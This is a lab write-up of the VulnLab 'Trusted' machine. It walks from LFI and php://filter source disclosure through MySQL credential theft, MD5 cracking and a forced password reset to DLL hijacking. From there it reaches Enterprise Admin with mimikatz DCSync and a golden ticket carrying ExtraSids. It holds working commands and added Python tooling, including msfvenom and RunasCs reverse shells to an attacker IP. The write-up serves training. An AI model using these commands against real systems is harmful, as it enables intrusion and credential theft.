VL-Trusted

Initial Reconnaissance

Our initial port scan revealed several open ports and services on the target. The rdp-ntlm-info output deserves a close read: the host is LABDC, its DNS domain is lab.trusted.vl and the tree name is trusted.vl, so this is a domain controller of a child domain inside the trusted.vl forest, which becomes the whole point later on:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.53
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-12 19:39:41Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows
443/tcp   open  ssl/http      syn-ack ttl 127 Apache httpd 2.4.53
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3306/tcp  open  mysql         syn-ack ttl 127 MariaDB 5.5.5-10.4.24
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 9
|   Capabilities flags: 63486
|   Some Capabilities: SupportsTransactions, Support41Auth, FoundRows, Speaks41ProtocolNew, SupportsCompression, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolOld, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: V7M]l*(*:'O="/g<2%a:
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal
| rdp-ntlm-info:
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-12T19:40:41+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49687/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57941/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
58459/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Web Enumeration

The target is running a web server on port 80. I used feroxbuster to discover hidden directories:

feroxbuster -u http://10.10.213.214/

This revealed a /dev directory:

301      GET        9l       30w      336c http://10.10.213.214/dev => http://10.10.213.214/dev/

(Screenshots: Xamoo homepage; Manes Winchester page)

Exploiting Local File Inclusion (LFI)

The /dev page loads its content through a view parameter. Testing that parameter for local file inclusion with a bare traversal:

http://10.10.213.214/dev/index.html?view=../

(Screenshot: unsecure file query, the parameter resolves the traversal)
Confirming the LFI vulnerability by accessing Windows system files:

http://10.10.213.214/dev/index.html?view=../../../../../../windows/win.ini

(Screenshot: LFI vulnerability confirmed, win.ini rendered in the page)
Using ffuf to enumerate readable files through the LFI. The -e flag appends the listed extensions to every wordlist entry, and -fl 35,33,40 drops responses with the line counts that non-hits produced, so only real inclusions remain:

ffuf -u "http://10.10.213.214/dev/index.html?view=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -e .php,.txt,.log,.ini -fl 35,33,40

(Screenshot: db.php found)
Including db.php directly would execute it and show nothing useful. Wrapping it in a php://filter chain makes PHP read the file and base64-encode it before inclusion, so the source comes back as text (the page is served as .html, but the wrapper working shows it is processed by PHP):

http://10.10.213.214/dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php
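The three LFI steps above (traversal probe, php://filter extraction, pulling credentials out of the decoded source) are scripted below as an added example; this is not code from the original write-up. It assumes the endpoint and parameter shown on the page (/dev/index.html, view), while the sample db.php and the offline demo_fetch stub are constructed here, so the script runs without a target and can be pointed at a real one by passing http_fetch.

```python
"""Scripted LFI source extraction via php://filter.

Added example, not code from the original write-up. The endpoint and
parameter (/dev/index.html, view) come from the page; SAMPLE_DB_PHP and
demo_fetch are constructed stand-ins so the script runs offline."""
import base64
import re
import urllib.parse
import urllib.request
from typing import Callable

# Constructed sample of what a db.php might look like; not the real file.
SAMPLE_DB_PHP = (
    "<?php\n"
    "$servername = \"localhost\";\n"
    "$username = \"root\";\n"
    "$password = \"ExamplePassw0rd!\";  // constructed value\n"
    "$dbname = \"news\";\n"
    "?>\n"
)


def traversal_payload(target: str, depth: int = 6) -> str:
    """'../' * depth followed by a drive-relative path; surplus '../' past
    the drive root is harmless, so err on the high side."""
    return "../" * depth + target.lstrip("/\\")


def filter_payload(resource: str) -> str:
    """php://filter wrapper: PHP reads the file, base64-encodes it and includes
    the encoded text, so source is returned instead of executed."""
    return f"php://filter/read=convert.base64-encode/resource={resource}"


def build_url(base: str, param: str, payload: str) -> str:
    # Keep '/', ':' and '=' literal so the wrapper syntax survives encoding.
    return f"{base}?{param}={urllib.parse.quote(payload, safe='/:=.')}"


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Real fetcher; swapped for demo_fetch in the offline run below."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def lfi_confirmed(base: str, param: str,
                  fetch: Callable[[str], str] = http_fetch) -> bool:
    """win.ini exists on every Windows install and has stable markers."""
    body = fetch(build_url(base, param, traversal_payload("windows/win.ini")))
    return "[fonts]" in body.lower() or "for 16-bit app support" in body.lower()


_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_base64(body: str) -> str:
    """The included text sits inside the page's HTML; take the longest
    base64-looking run so surrounding template markup is ignored."""
    runs = _B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 blob in response; filter chain not applied?")
    return max(runs, key=len)


def dump_source(base: str, param: str, resource: str,
                fetch: Callable[[str], str] = http_fetch) -> str:
    blob = extract_base64(fetch(build_url(base, param, filter_payload(resource))))
    blob += "=" * (-len(blob) % 4)  # restore padding if the template ate it
    return base64.b64decode(blob).decode("utf-8", "replace")


_CRED_RE = re.compile(
    r"\$(\w*(?:server|host|user|pass|db)\w*)\s*=\s*['\"]([^'\"]*)['\"]",
    re.IGNORECASE)


def find_credentials(php_source: str) -> dict:
    """Quoted assignments to variables that look connection-related."""
    return {name: value for name, value in _CRED_RE.findall(php_source)}


def demo_fetch(url: str) -> str:
    """Offline stand-in for the target (constructed): answers the filter URL
    with the sample db.php wrapped in HTML and the win.ini probe with a marker."""
    if "php://filter" in url and url.endswith("db.php"):
        blob = base64.b64encode(SAMPLE_DB_PHP.encode()).decode()
        return f"<html><body><div class='content'>{blob}</div></body></html>"
    if "win.ini" in url:
        return "<html><body>; for 16-bit app support\n[fonts]\n</body></html>"
    return "<html><body>not found</body></html>"


if __name__ == "__main__":
    base, param = "http://10.10.213.214/dev/index.html", "view"
    print("LFI confirmed:", lfi_confirmed(base, param, fetch=demo_fetch))
    src = dump_source(base, param, "db.php", fetch=demo_fetch)
    print(src)
    print(find_credentials(src))
```

Against a live target, replace fetch=demo_fetch with the default http_fetch; everything else stays the same. The longest-run heuristic in extract_base64 is what makes the decode robust when the included text lands inside a template full of markup.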

(Screenshot: database credentials in the decoded db.php)

Database Enumeration

After decoding the base64 output, I obtained MySQL credentials:
root : SuperSecureMySQLPassw0rd1337.
Connecting to the MySQL server, which the port scan showed reachable remotely on 3306:

mysql -h 10.10.213.214 -u root -p --skip-ssl

Enumerated the databases and tables:

SHOW DATABASES;
USE news;
SHOW TABLES;
SELECT * FROM users;

Retrieved user credentials:

+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password |
+----+------------+--------------+-----------+----------------------------------+
| 1 | Robert | rsmith | Smith | 7e7abb54bbef42f0fbfa3007b368def7 |
| 2 | Eric | ewalters | Walters | d6e81aeb4df9325b502a02f11043e0ad |
| 3 | Christine | cpowers | Powers | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+

The password column holds 32-character hex digests with no salt, consistent with plain MD5. Running them against a wordlist cracked one of the three:

rsmith : IHateEric2
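A minimal wordlist-and-rules attack on the digests from the users table, as an added example (not code from the original write-up). The three hashes are the page's; the wordlist, the mangling rules and the password used in the self-check are constructed. It shows why unsalted MD5 is cheap to attack: one digest per candidate is compared against every target through a reverse lookup table.

```python
"""Wordlist + rule attack on unsalted MD5 digests.

Added example, not from the original write-up. PAGE_HASHES are the digests
from the users table; SAMPLE_WORDLIST and the rule set are constructed."""
import hashlib
import itertools
from typing import Dict, Iterable, Optional

# Digests as shown in the users table (user -> hash).
PAGE_HASHES = {
    "rsmith": "7e7abb54bbef42f0fbfa3007b368def7",
    "ewalters": "d6e81aeb4df9325b502a02f11043e0ad",
    "cpowers": "e3d3eb0f46fe5d75eed8d11d54045a60",
}

# Constructed wordlist; a real run streams rockyou.txt or similar.
SAMPLE_WORDLIST = ["password", "welcome", "summer", "winter", "admin"]
YEARS = [str(y) for y in range(2015, 2026)]
SUFFIXES = ["", "1", "2", "123", "!", "@", "#"] + YEARS


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def identify_hash(h: str) -> Optional[str]:
    """Cheap length/alphabet check. 32 hex chars with no salt or prefix is
    what unsalted MD5 (and NTLM) look like; confirm by cracking, not guessing."""
    h = h.strip()
    if h and all(c in "0123456789abcdefABCDEF" for c in h):
        return {32: "md5-or-ntlm", 40: "sha1", 64: "sha256"}.get(len(h))
    return None


def mangle(word: str) -> Iterable[str]:
    """Rules users actually apply: case variants times common suffixes.
    Constructed rule set; hashcat's best64.rule is the real-world version."""
    bases = {word, word.lower(), word.capitalize(), word.upper()}
    for base, suffix in itertools.product(bases, SUFFIXES):
        yield base + suffix


def crack(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Unsalted digests let one candidate be checked against every target at
    once: hash it once, look it up in a dict keyed by digest."""
    wanted = {h.lower(): user for user, h in hashes.items()}
    found: Dict[str, str] = {}
    for word in wordlist:
        for candidate in mangle(word):
            user = wanted.get(md5hex(candidate))
            if user and user not in found:
                found[user] = candidate
                if len(found) == len(wanted):
                    return found
    return found


if __name__ == "__main__":
    for user, h in PAGE_HASHES.items():
        print(user, h, identify_hash(h))
    print(crack(PAGE_HASHES, SAMPLE_WORDLIST))
```

For anything beyond a demo use hashcat -m 0 with a proper rule file; the point of the block is the lookup-table structure, which is also why a salt per row (or a slow KDF such as bcrypt) would have made this table far more expensive to attack.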

SMB Enumeration

Checked for accessible SMB shares with the credentials:

netexec smb 10.10.213.214 -u rsmith -p <PASS> --shares

(Screenshot: shares accessible to rsmith)
Other user accounts identified from the share listing:

ewalters  
cpowers

No valuable content was found on the accessible shares.

Active Directory Enumeration with BloodHound

Collected BloodHound data over LDAP with netexec to map the domain (the DC doubles as DNS, hence --dns-server pointing at the target):

netexec ldap 10.10.213.214 -u rsmith -p IHateEric2 --bloodhound --dns-server 10.10.213.214 -c ALL --dns-tcp

BloodHound showed a bidirectional trust between trusted.vl and lab.trusted.vl. Together with the DNS_Tree_Name from the port scan this confirms lab.trusted.vl is a child domain of the trusted.vl forest, and parent-child trusts are exactly the kind that is not SID-filtered:
(Screenshot: cross-domain trust)
It also showed that rsmith has ForceChangePassword over ewalters:
(Screenshot: attack path)

Lateral Movement

ForceChangePassword lets rsmith reset ewalters' password without knowing the current one. This locks the real user out and is noisy, which is acceptable in the lab but worth flagging on a real engagement:

bloodyAD --host "labdc.lab.trusted.vl" -d "lab.trusted.vl" -u "rsmith" -p "<PASS>" set password "ewalters" "HelloWorld123@"

Connecting with the new credentials:

evil-winrm -i labdc.lab.trusted.vl -u ewalters -p HelloWorld123@

In the C:\AVTest directory, found an interesting readme:

type readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.

DLL Hijacking

Transferred KasperskyRemovalTool.exe from C:\AVTest to the attacking machine for analysis. On Linux, an SMB share to receive it:

impacket-smbserver smb /mnt -smb2support

On Windows:

copy .\KasperskyRemovalTool.exe \\10.8.5.195\smb\KasperskyRemovalTool.exe

Analyzed the executable with Process Monitor on a Windows VM to find DLL search-order hijacking opportunities: DLLs the program asks for that do not exist where it looks first.

Set up filters for:

  1. Process Name is KasperskyRemovalTool.exe
  2. Path ends with .dll
  3. Result is NAME NOT FOUND

(Screenshots: the three Process Monitor filters)
Process Monitor showed the executable probing for KasperskyRemovalToolENU.dll in its own directory and failing with NAME NOT FOUND. The application directory is searched before System32, so a DLL of that name dropped next to the executable is what gets loaded:
(Screenshot: the failed lookup for KasperskyRemovalToolENU.dll)
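The same triage done programmatically over a Process Monitor CSV export, as an added example (not code from the original write-up): it applies the three filters above and ranks the survivors by where the lookup first failed. The rows are constructed to resemble a Procmon export; only the column layout is Procmon's, and the paths are assumptions based on the lab's C:\AVTest directory.

```python
"""Triage a Process Monitor CSV export for DLL search-order hijacking.

Added example, not from the original write-up. SAMPLE_CSV is constructed;
the column names match Procmon's default CSV export."""
import csv
import io
import ntpath
from typing import Dict, List

SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"7:41:02.1001 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"7:41:02.1002 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\Windows\\System32\\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"7:41:02.1003 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"7:41:02.1004 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\version.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"7:41:02.1005 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\Windows\\System32\\version.dll","SUCCESS","Desired Access: Read Attributes"
"7:41:02.1006 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\settings.ini","NAME NOT FOUND","Desired Access: Generic Read"
"7:41:02.1007 PM","explorer.exe","1234","CreateFile","C:\\Users\\ewalters\\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"""


def hijack_candidates(csv_text: str, process: str) -> Dict[str, dict]:
    """Map lowercase DLL name -> {'missing_in': [dirs in probe order],
    'found_in': dir or None} for the given process.

    A DLL that is probed in the executable's own directory and missing there
    is the classic target. One that is later found in System32 (version.dll
    in the sample) is still hijackable, because the application directory is
    searched first, unless the name is protected by KnownDLLs."""
    out: Dict[str, dict] = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process.lower():
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue
        directory, name = ntpath.split(path)
        entry = out.setdefault(name.lower(), {"missing_in": [], "found_in": None})
        if row["Result"] == "NAME NOT FOUND":
            entry["missing_in"].append(directory)
        elif row["Result"] == "SUCCESS" and entry["found_in"] is None:
            entry["found_in"] = directory
    return {n: e for n, e in out.items() if e["missing_in"]}


def rank(candidates: Dict[str, dict], exe_dir: str) -> List[str]:
    """Prefer DLLs whose first failed probe is the executable's directory
    (assumed writable, as C:\\AVTest was for ewalters on the page), then
    DLLs that never resolve anywhere over ones satisfied later by System32."""
    def score(item):
        name, e = item
        first_in_exe_dir = e["missing_in"][0].lower() == exe_dir.lower()
        return (not first_in_exe_dir, e["found_in"] is not None, name)
    return [name for name, _ in sorted(candidates.items(), key=score)]


if __name__ == "__main__":
    cands = hijack_candidates(SAMPLE_CSV, "KasperskyRemovalTool.exe")
    for name in rank(cands, r"C:\AVTest"):
        print(name, cands[name])
```

Export the Procmon capture with File > Save as CSV and feed it in; the ranking is only a heuristic, and the bitness of the executable still has to be checked before building a payload.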
Created a DLL with that name whose DllMain spawns a reverse shell. The payload must match the executable's bitness: windows/shell_reverse_tcp is 32-bit, and a 64-bit program would need windows/x64/shell_reverse_tcp, since a DLL of the wrong architecture simply fails to load:

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.5.195 LPORT=4444 -f dll > KasperskyRemovalToolENU.dll

The same impacket-smbserver share is reused to move the DLL in the other direction:

impacket-smbserver smb /mnt -smb2support

Copied the malicious DLL into C:\AVTest next to the executable:

copy \\10.8.5.195\smb\KasperskyRemovalToolENU.dll .\KasperskyRemovalToolENU.dll

With a listener waiting on port 4444, the next run of the Kaspersky tool (the readme says Christine runs these regularly) loaded the DLL and sent back a reverse shell:
(Screenshot: reverse shell received)

Privilege Escalation via Domain Trust Abuse

Uploaded Mimikatz to dump the trust keys and then forge a ticket across the trust. privilege::debug acquires SeDebugPrivilege, so these steps need an administrative shell, which the shell from the DLL hijack evidently was; lsadump::trust /patch then lists the inter-realm trust keys:

privilege::debug
lsadump::trust /patch

(Screenshot: lsadump::trust output)
Extracted the krbtgt hash of the child domain with DCSync:

lsadump::dcsync /domain:lab.trusted.vl /all

(Screenshot: krbtgt hash)

Gathered the following information:

  1. lab.trusted.vl domain SID: S-1-5-21-2241985869-2159962460-1278545866
  2. trusted.vl domain SID: S-1-5-21-3576695518-347000760-3731839591, to which RID 519 (Enterprise Admins) is appended
  3. lab.trusted.vl krbtgt NT hash: c7a03c565c68c6fac5f8913fab576ebd
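Before forging anything it is worth checking that the trust will actually honour an injected SID. The block below, an added example rather than code from the original write-up, decodes the trustAttributes and trustDirection bits of a trustedDomain object (bit names per MS-ADTS) and gives a verdict on the ExtraSids attack for the two domain SIDs gathered above. The page shows the trust only through BloodHound, so the raw attribute values in SAMPLE_TRUST are constructed to represent a parent-child trust.

```python
"""Decode trustedDomain attributes and judge SID-history (ExtraSids) abuse.

Added example, not from the original write-up. LAB_SID and ROOT_SID are
the page's; SAMPLE_TRUST is a constructed trustedDomain object."""
import re
from typing import Dict, List

TRUST_ATTRIBUTES = {
    0x001: "NON_TRANSITIVE",
    0x002: "UPLEVEL_ONLY",
    0x004: "QUARANTINED_DOMAIN",      # SID filtering ("quarantine") enforced
    0x008: "FOREST_TRANSITIVE",
    0x010: "CROSS_ORGANIZATION",
    0x020: "WITHIN_FOREST",           # parent-child or tree-root trust
    0x040: "TREAT_AS_EXTERNAL",
    0x080: "USES_RC4_ENCRYPTION",
    0x200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x400: "PIM_TRUST",
    0x800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}
TRUST_DIRECTION = {0: "DISABLED", 1: "INBOUND", 2: "OUTBOUND", 3: "BIDIRECTIONAL"}

LAB_SID = "S-1-5-21-2241985869-2159962460-1278545866"   # lab.trusted.vl
ROOT_SID = "S-1-5-21-3576695518-347000760-3731839591"   # trusted.vl
ENTERPRISE_ADMINS_RID = 519

# Constructed: how lab.trusted.vl would describe its parent in LDAP.
SAMPLE_TRUST = {"trustPartner": "trusted.vl", "trustDirection": 3,
                "trustAttributes": 0x20, "securityIdentifier": ROOT_SID}

_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")


def decode_attributes(value: int) -> List[str]:
    return [name for bit, name in TRUST_ATTRIBUTES.items() if value & bit]


def extra_sid(domain_sid: str, rid: int = ENTERPRISE_ADMINS_RID) -> str:
    """The value handed to mimikatz /sids: target domain SID plus group RID."""
    return f"{domain_sid}-{rid}"


def split_sid(sid: str):
    """'S-1-5-21-a-b-c-519' -> ('S-1-5-21-a-b-c', 519)."""
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain-scoped SID: {sid}")
    return sid[: m.start(1) - 1], int(m.group(1))


def sid_history_verdict(trust: Dict, forged_sid: str) -> Dict[str, object]:
    """Will the trusting KDC keep `forged_sid` from a ticket issued across
    this trust? Inside one forest no SID filtering is applied, which is why
    a child-domain compromise reaches the forest root. A quarantined trust
    drops every SID outside the trusted domain, and a forest trust drops
    SIDs that do not belong to the trusted forest; the forged SID belongs
    to the target side, so both cases reject it."""
    attrs = decode_attributes(trust["trustAttributes"])
    domain, _rid = split_sid(forged_sid)
    blockers = []
    if domain != trust["securityIdentifier"]:
        blockers.append("forged SID is not in the trusted domain's SID namespace")
    if "QUARANTINED_DOMAIN" in attrs:
        blockers.append("SID filtering (quarantine) is enforced on this trust")
    elif "WITHIN_FOREST" not in attrs:
        blockers.append("cross-forest trust: SIDs from the target forest are filtered")
    return {"direction": TRUST_DIRECTION[trust["trustDirection"]],
            "attributes": attrs, "feasible": not blockers, "blockers": blockers}


if __name__ == "__main__":
    sid = extra_sid(ROOT_SID)
    print("/sids value:", sid)
    print(sid_history_verdict(SAMPLE_TRUST, sid))
```

The same decoder applied to a trustedDomain object with 0x8 (FOREST_TRANSITIVE) or 0x4 (QUARANTINED_DOMAIN) set reports the attack as blocked, which is the practical difference between a domain boundary and a forest boundary.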

This is the SID-history (ExtraSids) attack across the parent-child trust. The ticket is forged for the child domain, but its ExtraSids field carries S-1-5-21-3576695518-347000760-3731839591-519, the Enterprise Admins group of the forest root; trusts within a forest are not SID-filtered, so trusted.vl's DC accepts that SID and treats the holder as an Enterprise Admin. Two points on the mimikatz syntax: the switch that injects the ticket into the current session is /ptt (a bare ptt is ignored), and /service:krbtgt /target:trusted.vl describes an inter-realm ticket, for which mimikatz is documented with the trust key from lsadump::trust /patch; with the child krbtgt hash, as used here, the plain golden-ticket form without /service and /target is the documented variant. The ExtraSids are what do the work either way:

kerberos::golden /user:Administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /rc4:c7a03c565c68c6fac5f8913fab576ebd /service:krbtgt /target:trusted.vl /ticket:trustkey.kirbi /ptt

With the forged ticket in the session, DCSync the parent domain from its own DC, trusteddc.trusted.vl, to pull every credential in trusted.vl:

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

(Screenshot: trusted.vl Administrator hash from DCSync)

Final Privilege Escalation

root.txt could not be read without an Administrator process context, so we reset the Administrator password and used RunasCs to spawn a shell as that account. Resetting a domain Administrator password is destructive and would be off-limits on a real engagement; the DCSync output already contains the NT hash, so pass-the-hash (with netexec or the impacket tools, for instance) reaches the same result without changing anything:

net user Administrator HelloWorld123@
./RunasCs.exe Administrator 'HelloWorld123@' cmd.exe -r '10.8.5.195:443'

This provided full administrative access to the forest root domain trusted.vl, completing the chain.